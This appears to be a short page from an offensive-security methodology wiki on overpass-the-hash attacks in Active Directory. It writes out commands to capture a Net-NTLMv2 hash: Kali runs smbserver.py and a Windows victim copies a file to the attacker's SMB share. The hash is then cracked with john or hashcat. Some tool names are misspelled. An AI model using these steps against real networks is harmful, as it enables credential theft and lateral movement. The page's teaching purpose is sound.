Overpass-the-hash Attack
Using a NT hash to obtain Kerberos tickets
Methodology
https://www.thehacker.recipes/ad/movement/kerberos/ptk
To execute the overpass the hash attack, get NTLM and Password first, and get Kerberos Tickets via NTLM hash and password.
See NTLM Poisoning - Responder section.
For SMB protocol, here is a quick way to grab Net-NTLM-v2 hash and crack it
# Kali
Kali> smbserver.py -smb2support smb .
# Windows
CMD> type null > hello.txt
CMD> copy hello.txt \\10.10.14.107\smb
# Kali
vi hashes.txt # and copy and past it
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
# or
hashcat hashes.txt /usr/share/wordlists/rockyou.txt 
Kerberos Tickets
For current user without password, use Rebeus.
For user with password or NTLM hash, you could use Impact tools.
Last updated